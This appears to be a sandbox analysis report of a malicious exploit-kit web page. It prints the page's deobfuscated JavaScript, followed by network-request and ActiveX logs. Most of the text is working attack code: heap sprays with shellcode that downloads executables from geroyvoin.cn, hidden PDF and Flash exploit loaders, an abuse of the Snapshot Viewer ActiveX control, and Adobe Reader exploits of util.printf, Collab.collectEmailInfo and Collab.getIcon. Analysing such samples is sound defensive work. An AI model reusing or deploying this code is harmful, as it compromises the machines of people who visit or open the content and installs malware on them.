195, 209, 191, 175, 216, 233, 236, 185, 206, 192, 226, 201, 157, 161, 179, 216, 172, 225, 
215, 222, 222, 119, 152, 114, 209, 208, 232, 227, 180, 166, 145, 158, 169, 169, 172, 148, 
161, 123, 155, 151, 171, 178, 147, 153, 124, 159, 168, 165, 167, 145, 176, 131, 159, 145, 
165, 170, 145, 156, 142, 167, 148, 185, 189, 136, 176, 132, 149, 141, 176, 233, 178, 214, 
121, 225, 201, 233, 187, 196, 224, 189, 215, 198, 234, 238, 181, 148, 114, 215, 200, 156, 
166, 119, 219, 173, 216, 139, 158, 181, 191, 206, 181, 156, 215, 218, 238, 145, 224, 191, 
224, 205, 215, 239, 196, 209, 115, 149, 219, 222, 222, 196, 212, 114, 154, 139, 166, 161, 
121, 167, 186, 208, 206, 163, 237, 181, 224, 140, 226, 216, 231, 227, 178, 225, 191, 211, 
140, 156, 226, 181, 213, 178, 214, 216, 156, 166, 119, 157, 114, 151, 159, 217, 233, 179, 
225, 184, 211, 210, 233, 168, 178, 219, 175, 231, 146, 214, 234, 192, 209, 185, 210, 167, 
221, 227, 188, 208, 115, 221, 198, 223, 163, 139, 233, 174, 207, 216, 216, 226, 120, 209, 
116, 233, 167, 228, 231, 192, 216, 176, 226, 201, 157, 163, 139, 222, 176, 226, 217, 231, 
232, 139, 233, 200, 120, 205, 219, 162, 191, 206, 181, 171, 139, 208, 233, 178, 214, 176, 
209, 216, 210, 161, 121, 231, 177, 221, 214, 157, 242, 112, 213, 185, 142, 209, 238, 221, 
177, 222, 190, 151, 223, 228, 220, 186, 169, 185, 211, 219, 149, 187, 179, 224, 180, 228, 
201, 205, 201, 178, 214, 176, 209, 216, 157, 161, 195, 218, 187, 228, 219, 163, 205, 190, 
205, 187, 225, 204, 228, 238, 112, 194, 180, 211, 219, 218, 236, 112, 175, 186, 220, 216, 
231, 233, 188, 154, 124, 149, 141, 176, 240, 177, 222, 107, 208, 217, 219, 183, 189, 229, 
174, 207, 214, 232, 213, 200, 201, 134, 221, 198, 223, 168, 170, 219, 186, 219, 161, 165, 
181, 191, 206, 181, 156, 183, 221, 233, 199, 186, 172, 228, 205, 220, 219, 196, 213, 186, 
220, 166, 234, 238, 196, 219, 185, 225, 161, 219, 219, 188, 223, 176, 169, 211, 215, 228, 
126, 173, 183, 218, 211, 236, 189, 191, 218, 191, 211, 220, 233, 199, 181, 218, 192, 171, 
202, 214, 230, 195, 209, 134, 221, 198, 223, 168, 163, 218, 172, 222, 215, 221, 233, 196, 
188, 172, 226, 204, 178, 161, 184, 224, 191, 222, 158, 164, 169, 183, 209, 189, 221, 221, 
235, 233, 185, 218, 121, 209, 210, 164, 171, 127, 214, 187, 231, 153, 163, 223, 200, 209, 
114, 169, 216, 231, 243, 203, 219, 173, 216, 146, 184, 233, 189, 220, 189, 211, 215, 232, 
223, 180, 188, 172, 226, 204, 178, 220, 197, 210, 134, 221, 198, 223, 168, 160, 222, 180, 
220, 216, 200, 232, 177, 220, 190, 214, 211, 233, 162, 121, 167, 193, 207, 214, 149, 237, 
190, 220, 176, 218, 201, 226, 223, 190, 224, 136, 210, 211, 216, 239, 189, 209, 185, 226, 
146, 216, 236, 181, 205, 191, 211, 169, 225, 223, 189, 209, 185, 226, 140, 156, 195, 150, 
190, 140, 187, 169, 156, 163, 139, 223, 185, 222, 201, 225, 223, 189, 209, 185, 226, 146, 
232, 223, 196, 173, 191, 226, 214, 222, 220, 197, 224, 176, 150, 139, 222, 222, 119, 152, 
114, 225, 210, 214, 234, 185, 210, 189, 207, 209, 218, 161, 121, 167, 190, 220, 212, 218, 
230, 181, 217, 176, 220, 216, 163, 237, 181, 224, 140, 226, 216, 231, 227, 178, 225, 191, 
211, 140, 156, 237, 194, 207, 114, 154, 139, 225, 222, 177, 220, 133, 157, 147, 166, 172, 
135, 154, 123, 156, 148, 163, 171, 119, 149, 134, 225, 210, 229, 223, 188, 209, 184, 211, 
210, 233, 168, 195, 209, 191, 175, 216, 233, 236, 185, 206, 192, 226, 201, 157, 161, 199, 
213, 175, 226, 204, 156, 166, 129, 149, 134, 225, 210, 229, 223, 188, 209, 184, 211, 210, 
233, 168, 195, 209, 191, 175, 216, 233, 236, 185, 206, 192, 226, 201, 157, 161, 184, 209, 
180, 213, 204, 233, 161, 124, 157, 116, 169, 215, 227, 234, 181, 216, 176, 219, 201, 227, 
238, 126, 223, 176, 226, 165, 233, 238, 194, 213, 173, 227, 216, 218, 162, 119, 223, 191, 
231, 208, 218, 161, 124, 147, 175, 215, 215, 229, 230, 177, 229, 133, 220, 211, 227, 223, 
139, 147, 116, 169, 200, 228, 221, 197, 217, 176, 220, 216, 163, 220, 191, 208, 196, 156, 
197, 229, 234, 181, 218, 175, 177, 204, 222, 230, 180, 148, 190, 220, 212, 218, 230, 181, 
217, 176, 220, 216, 158, 181, 198, 205, 189, 142, 215, 227, 219, 192, 224, 180, 219, 201, 
231, 183, 195, 209, 191, 183, 210, 233, 223, 194, 226, 172, 218, 140, 232, 232, 192, 213, 
185, 226, 214, 235, 230, 120, 149, 119, 160, 148, 165, 170, 121, 167, 200, 209, 197, 233, 
221, 184, 148, 176, 151, 223, 184, 233, 189, 220, 183, 211, 216, 218, 162, 121, 167, 189, 
211, 216, 234, 236, 190, 167, 200, 235, 225, 127, 189, 191, 217, 187, 218, 201, 233, 223, 
120, 149, 134, 224, 201, 233, 239, 194, 218, 134, 235, 110, 219, 239, 190, 207, 191, 215, 
211, 227, 154, 195, 218, 187, 215, 210, 233, 236, 198, 216, 115, 151, 223, 222, 224, 120, 
219, 173, 216, 146, 231, 223, 177, 208, 196, 193, 216, 214, 238, 181, 169, 136, 162, 141, 
240, 221, 188, 209, 172, 224, 173, 227, 238, 181, 222, 193, 207, 208, 157, 237, 190, 205, 
187, 226, 205, 226, 223, 194, 149, 134, 210, 211, 216, 239, 189, 209, 185, 226, 146, 220, 
223, 196, 177, 183, 211, 209, 218, 232, 196, 174, 196, 183, 200, 157, 161, 195, 218, 172, 
222, 205, 219, 236, 177, 217, 176, 149, 141, 163, 237, 194, 207, 136, 149, 132, 225, 222, 
177, 220, 133, 157, 147, 166, 172, 135, 154, 123, 156, 148, 163, 171, 119, 167, 174, 218, 
201, 214, 236, 153, 218, 191, 211, 214, 235, 219, 188, 148, 190, 220, 197, 229, 238, 185, 
217, 176, 224, 141, 176, 247, 205, 118, 175, 215, 214, 218, 221, 196, 223, 179, 221, 219, 
157, 163, 139];

(repeated 1 time)

function CheckIP(){
  var req = null;
  try {
    req = new ActiveXObject("Msxml2.XMLHTTP");
  }
  catch (e){
    try {
      req = new ActiveXObject("Microsoft.XMLHTTP");
    }
    catch (e){
      try {
        req = new XMLHttpRequest();
      }
      catch (e){
      }
    }
  }
  if (req == null)return false;
  req.open("GET", "/1/show.php?get_ajax=1&r=" + Math.random(), false);
  req.send(null);
  if (req.responseText == "1"){
    return true;
  }
  else {
    return false;
  }
}
function Complete(){
  setTimeout('location.href = "http://ask.com"', 10000);
}
function directshow(){
  var shellcode = unescape("
%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C
%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3
%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB
%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3
%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698
%u33AB%uB8C0%u6461%u0000%u6850%u6854%u6572%u2435%u691C%u5074%u5354%uAAB8%u0DFC%uFF7C%u0455
%uF88B%uC483%uB00C%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455
%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u4CC2%u5052%u36B8%u2F1A%uFF70%u0455%u575B%uB856
%uFE98%u0E8A%u55FF%u6A04%uFF00%u68D7%u7474%u3A70%u2F2F%u6567%u6F72%u7679%u696F%u2E6E%u6E63
%u312F%u622F%u6564%u7170%u3272%u652E%u6578%u0000");
  var bigblock = unescape("%u9090%u9090");
  var headersize = 20;
  var slackspace = headersize + shellcode.length;
  while (bigblock.length < slackspace)bigblock += bigblock;
  var fillblock = bigblock.substring(0, slackspace);
  var block = bigblock.substring(0, bigblock.length - slackspace);
  while (block.length + slackspace < 0x30000){
    block = block + block + fillblock;
  }
  var memory = new Array();
  for (var i = 0; i < 300; i ++ ){
    memory[i] = block + shellcode;
  }
  try {
    var obj = document.createElement('object');
    document.body.appendChild(obj);
    obj.width = '1';
    obj.height = '1';
    obj.data = './cosx.ipg';
    obj.classid = 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
    setTimeout(pdf(), 500);
  }
  catch (e){
    pdf();
  }
}
function pdf(){
  var isInstalled = false;
  if (navigator.plugins && navigator.plugins.length){
    for (var x = 0; x < navigator.plugins.length; x ++ ){
      if (navigator.plugins[x].description.indexOf('Adobe Acrobat') !=- 1){
        isInstalled = true;
        break ;
      }
      if (navigator.plugins[x].description.indexOf('Adobe PDF') !=- 1){
        isInstalled = true;
        break ;
      }
    }
  }
  else if (window.ActiveXObject){
    var control = null;
    try {
      control = new ActiveXObject('AcroPDF.PDF');
    }
    catch (e){
    }
    if (!control){
      try {
        control = new ActiveXObject('PDF.PdfCtrl');
      }
      catch (e){
      }
    }
    if (control){
      isInstalled = true;
    }
  }
  if (isInstalled){
    var ua = navigator.userAgent.toLowerCase();
    if (ua.indexOf("firefox") !=- 1){
      var hpuz = document.createElement('embed');
      hpuz.setAttribute('src', './cegmoprwx.pdf');
      hpuz.setAttribute('href', './cegmoprwx.pdf');
      hpuz.setAttribute('type', 'application/pdf');
      hpuz.setAttribute('width', 200);
      hpuz.setAttribute('height', 200);
      hpuz.setAttribute('style', 'display:none;');
      document.body.appendChild(hpuz);
    }
    else {
      var hpuz = document.createElement('iframe');
      hpuz.setAttribute('src', './cegmoprwx.pdf');
      hpuz.setAttribute('width', 200);
      hpuz.setAttribute('height', 200);
      hpuz.setAttribute('style', 'display:none;');
      document.body.appendChild(hpuz);
    }
    setTimeout(flash(), 1500);
    return ;
  }
  flash();
  return ;
}
function flash(){
  var PlayerVersion = [0, 0, 0];
  if (navigator.plugins && navigator.mimeTypes.length){
    var x = navigator.plugins["Shockwave Flash"];
    if (x && x.description){
      PlayerVersion = x.description.replace(/([a-zA-Z]|\s)+/, "").replace(
      /(\s+r|\s+b[0-9]+)/, ".").split(".");
    }
  }
  else {
    try {
      var fv = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
      if (fv != null){
        PlayerVersion = fv.GetVariable("\$version").split(" ")[1].split(",");
      }
    }
    catch (e){
      snapshot();
      return ;
    }
  }
  var version1 = PlayerVersion[0] != null ? parseInt(PlayerVersion[0]) : 0;
  var version2 = PlayerVersion[1] != null ? parseInt(PlayerVersion[1]) : 0;
  var version3 = PlayerVersion[2] != null ? parseInt(PlayerVersion[2]) : 0;
  if (version1 == 9 && version3 < 124){
    var ua = navigator.userAgent.toLowerCase();
    if (ua.indexOf("firefox") !=- 1){
      var swfelement = document.createElement('embed');
      document.body.appendChild(swfelement);
      swfelement.width = '1';
      swfelement.height = '1';
      swfelement.src = './manual.swf';
      swfelement.type = 'application/x-shockwave-flash';
    }
    else {
      var swfelement = document.createElement('iframe');
      swfelement.setAttribute('src', './manual.swf');
      swfelement.setAttribute('width', 200);
      swfelement.setAttribute('height', 200);
      swfelement.setAttribute('style', 'display:none;');
      document.body.appendChild(swfelement);
    }
  }
  snapshot();
}
function snapshot(){
  var x;
  var obj;
  var mycars = new Array();
  mycars[0] = 'c:/Program Files/Outlook Express/wab.exe';
  mycars[1] = 'd:/Program Files/Outlook Express/wab.exe';
  mycars[2] = 'e:/Program Files/Outlook Express/wab.exe';
  try {
    var obj = new ActiveXObject('snpvw.Snapshot Viewer Control.1');
  }
  catch (e){
    try {
      var obj = document.createElement('object');
      obj.setAttribute('classid', 'clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9');
      obj.setAttribute('id', 'obj');
      obj.setAttribute('width', '1');
      obj.setAttribute('height', '1');
      document.body.appendChild(obj);
    }
    catch (e){
      Complete();
      return ;
    }
  }
  if (obj = '[object]'){
    for (xin mycars){
      obj = new ActiveXObject('snpvw.Snapshot Viewer Control.1');
      var buf = mycars[x];
      obj.Zoom = 0;
      obj.ShowNavigationButtons = false;
      obj.AllowContextMenu = false;
      obj.SnapshotPath = 'http://geroyvoin.cn/1/jpy5.exe';
      try {
        obj.CompressedPath = buf;
        obj.PrintSnapshot();
        var snpelement = document.createElement('IFRAME');
        snpelement.setAttribute('id', 'snapiframe');
        snpelement.setAttribute('src', 'ldap://127.0.0.1');
        snpelement.setAttribute('width', 1);
        snpelement.setAttribute('height', 1);
        snpelement.setAttribute('style', 'display:none;');
        document.body.appendChild(snpelement);
        var snaptimer = setInterval(snpintrvl(), 2000);
      }
      catch (e){
        Complete();
        return ;
      }
    }
  }
  Complete();
  return ;
}
function snpintrvl(){
  if (obj.readyState == 4){
    clearInterval(snaptimer);
    document.getElementById('snapiframe').src = ' ldap://127.0.0.1';
    clearInterval(snaptimer);
  }
}
directshow();

(repeated 1 time)

function fix_it(yarsp, len){
  while (yarsp.length * 2 < len){
    yarsp += yarsp;
  }
  yarsp = yarsp.substring(0, len / 2);
  return yarsp;
}
function util_printf(){
  var payload = unescape("
%u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C
%u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D
%u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B
%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF
%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303
%u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E
%uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA
%u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E
%uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF
%u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u672F%u7265%u796F%u6F76
%u6E69%u632E%u2F6E%u2F31%u6462%u6C66%u3375%u652E%u6578%u0000");
  var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A")var heapblock = nop + payload;
  var bigblock = unescape("%u0A0A%u0A0A");
  var headersize = 20;
  var spray = headersize + heapblock.length;
  while (bigblock.length < spray){
    bigblock += bigblock;
  }
  var fillblock = bigblock.substring(0, spray);
  var block = bigblock.substring(0, bigblock.length - spray);
  while (block.length + spray < 0x40000){
    block = block + block + fillblock;
  }
  var mem_array = new Array();
  for (var i = 0; i < 1400; i ++ ){
    mem_array[i] = block + heapblock;
  }
  var num = 
129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888
888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
88888888888888888888888888;
  util.printf("%45000f", num);
}
function collab_email(){
  var shellcode = unescape("
%u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C
%u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D
%u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B
%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF
%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303
%u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E
%uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA
%u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E
%uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF
%u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u672F%u7265%u796F%u6F76
%u6E69%u632E%u2F6E%u2F31%u6762%u6E6D%u7372%u7A79%u2E33%u7865%u0065");
  var mem_array = new Array();
  var cc = 0x0c0c0c0c;
  var addr = 0x400000;
  var sc_len = shellcode.length * 2;
  var len = addr - (sc_len + 0x38);
  var yarsp = unescape("%u9090%u9090");
  yarsp = fix_it(yarsp, len);
  var count2 = (cc - 0x400000) / addr;
  for (var count = 0; count < count2; count ++ ){
    mem_array[count] = yarsp + shellcode;
  }
  var overflow = unescape("%u0c0c%u0c0c");
  while (overflow.length < 44952){
    overflow += overflow;
  }
  this .collabStore = Collab.collectEmailInfo({
    subj : "", msg : overflow
  }
  );
}
function collab_geticon(){
  if (app.doc.Collab.getIcon){
    var arry = new Array();
    var vvpethya = unescape("
%u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C
%u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D
%u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B
%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF
%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303
%u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E
%uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA
%u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E
%uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF
%u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u672F%u7265%u796F%u6F76
%u6E69%u632E%u2F6E%u2F31%u7064%u7472%u337A%u652E%u6578%u0000");
    var hWq500CN = vvpethya.length * 2;
    var len = 0x400000 - (hWq500CN + 0x38);
    var yarsp = unescape("%u9090%u9090");
    yarsp = fix_it(yarsp, len);
    var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
    for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
      arry[vqcQD96y] = yarsp + vvpethya;
    }
    var tUMhNbGw = unescape("%09");
    while (tUMhNbGw.length < 0x4000){
      tUMhNbGw += tUMhNbGw;
    }
    tUMhNbGw = "N." + tUMhNbGw;
    app.doc.Collab.getIcon(tUMhNbGw);
  }
}
function pdf_start(){
  var version = app.viewerVersion.toString();
  version = version.replace(/\D/g, '');
  var varsion_array = new Array(version.charAt(0), version.charAt(1), version.charAt(2));
  if ((varsion_array[0] == 8) && (varsion_array[1] == 0) || (varsion_array[1] == 1 && 
  varsion_array[2] < 3)){
    util_printf();
  }
  if ((varsion_array[0] < 8) || (varsion_array[0] == 8 && varsion_array[1] < 2 && 
  varsion_array[2] < 2)){
    collab_email();
  }
  if ((varsion_array[0] < 9) || (varsion_array[0] == 9 && varsion_array[1] < 1)){
    collab_geticon();
  }
}
pdf_start();

(repeated 1 time)

function fix_it(yarsp, len){
  while (yarsp.length * 2 < len){
    yarsp += yarsp;
  }
  yarsp = yarsp.substring(0, len / 2);
  return yarsp;
}
function util_printf(){
  var payload = unescape("
%u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C
%u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D
%u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B
%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF
%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303
%u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E
%uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA
%u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E
%uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF
%u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u672F%u7265%u796F%u6F76
%u6E69%u632E%u2F6E%u2F31%u6664%u7877%u2E33%u7865%u0065");
  var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A")var heapblock = nop + payload;
  var bigblock = unescape("%u0A0A%u0A0A");
  var headersize = 20;
  var spray = headersize + heapblock.length;
  while (bigblock.length < spray){
    bigblock += bigblock;
  }
  var fillblock = bigblock.substring(0, spray);
  var block = bigblock.substring(0, bigblock.length - spray);
  while (block.length + spray < 0x40000){
    block = block + block + fillblock;
  }
  var mem_array = new Array();
  for (var i = 0; i < 1400; i ++ ){
    mem_array[i] = block + heapblock;
  }
  var num = 
129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888
888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
88888888888888888888888888;
  util.printf("%45000f", num);
}
function collab_email(){
  var shellcode = unescape("
%u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C
%u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D
%u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B
%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF
%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303
%u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E
%uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA
%u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E
%uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF
%u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u672F%u7265%u796F%u6F76
%u6E69%u632E%u2F6E%u2F31%u6664%u7170%u7A75%u2E33%u7865%u0065");
  var mem_array = new Array();
  var cc = 0x0c0c0c0c;
  var addr = 0x400000;
  var sc_len = shellcode.length * 2;
  var len = addr - (sc_len + 0x38);
  var yarsp = unescape("%u9090%u9090");
  yarsp = fix_it(yarsp, len);
  var count2 = (cc - 0x400000) / addr;
  for (var count = 0; count < count2; count ++ ){
    mem_array[count] = yarsp + shellcode;
  }
  var overflow = unescape("%u0c0c%u0c0c");
  while (overflow.length < 44952){
    overflow += overflow;
  }
  this .collabStore = Collab.collectEmailInfo({
    subj : "", msg : overflow
  }
  );
}
function collab_geticon(){
  if (app.doc.Collab.getIcon){
    var arry = new Array();
    var vvpethya = unescape("
%u6490%u18A1%u0000%u8B00%u3040%u408B%u8B54%u0440%u408B%u8B04%u0440%u200D%u2000%u3D00%u007C
%u0077%u0174%u33C3%u64C0%u408B%u7830%u8B0C%u0C40%u708B%uAD1C%u588B%uEB08%u8B09%u3440%u408D
%u8B7C%u3C58%u446A%uD15A%u2BE2%u8BE2%uEBEC%u5A4F%u8352%u56EA%u5589%u5604%u8B57%u3C73%u748B
%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF
%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303
%u5E5F%uC350%u7D8D%u5708%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u75B8%u652E
%uAB78%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA
%u7C0D%u55FF%u8B04%u83F8%u0CC4%u6CB0%uE08A%u5098%u6F68%u2E6E%u6864%u7275%u6D6C%uB854%u4E8E
%uEC0E%u55FF%u9304%u3350%u50C0%u5650%u558B%u8304%u7FC2%uC283%u524C%uB850%u1A36%u702F%u55FF
%u5B04%u5657%u98B8%u8AFE%uFF0E%u0455%u006A%uD7FF%u7468%u7074%u2F3A%u672F%u7265%u796F%u6F76
%u6E69%u632E%u2F6E%u2F31%u6564%u6A67%u3374%u652E%u6578%u0000");
    var hWq500CN = vvpethya.length * 2;
    var len = 0x400000 - (hWq500CN + 0x38);
    var yarsp = unescape("%u9090%u9090");
    yarsp = fix_it(yarsp, len);
    var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
    for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
      arry[vqcQD96y] = yarsp + vvpethya;
    }
    var tUMhNbGw = unescape("%09");
    while (tUMhNbGw.length < 0x4000){
      tUMhNbGw += tUMhNbGw;
    }
    tUMhNbGw = "N." + tUMhNbGw;
    app.doc.Collab.getIcon(tUMhNbGw);
  }
}
function pdf_start(){
  var version = app.viewerVersion.toString();
  version = version.replace(/\D/g, '');
  var varsion_array = new Array(version.charAt(0), version.charAt(1), version.charAt(2));
  if ((varsion_array[0] == 8) && (varsion_array[1] == 0) || (varsion_array[1] == 1 && 
  varsion_array[2] < 3)){
    util_printf();
  }
  if ((varsion_array[0] < 8) || (varsion_array[0] == 8 && varsion_array[1] < 2 && 
  varsion_array[2] < 2)){
    collab_email();
  }
  if ((varsion_array[0] < 9) || (varsion_array[0] == 9 && varsion_array[1] < 1)){
    collab_geticon();
  }
}
pdf_start();

(repeated 1 time)

Writes

No writes.

Network Activity

Requests

URL	Status	Content Type
http://geroyvoin.cn/1/show.php?s=747bbfed51	200	text/html
about:blank	200	text/html
http://geroyvoin.cn/1/cegmoprwx.pdf	200	application/pdf

Redirects

No redirects.

ActiveX controls

0955AC62-BF2E-4CBA-A2B9-A63F772D46CF
	Name	Value	Count
Attributes	width	1	1
	data	./cosx.ipg	1
	height	1	1

AcroPDF.PDF

No attribute setting or method call detected

AcroPDF.PDF
No attribute setting or method call detected

AcrobatJavaScript
	Name	Arg0	Arg1	Count
Methods	Collab.getIcon	N............................................................................... ................................................................................ ................................................................................ other 15840 bytes ................................................................................ ................................................................................ ................................................................................ ..................................................................		1
	Collab.getIcon	N............................................................................... ................................................................................ ................................................................................ other 15840 bytes ................................................................................ ................................................................................ ................................................................................ ..................................................................		1
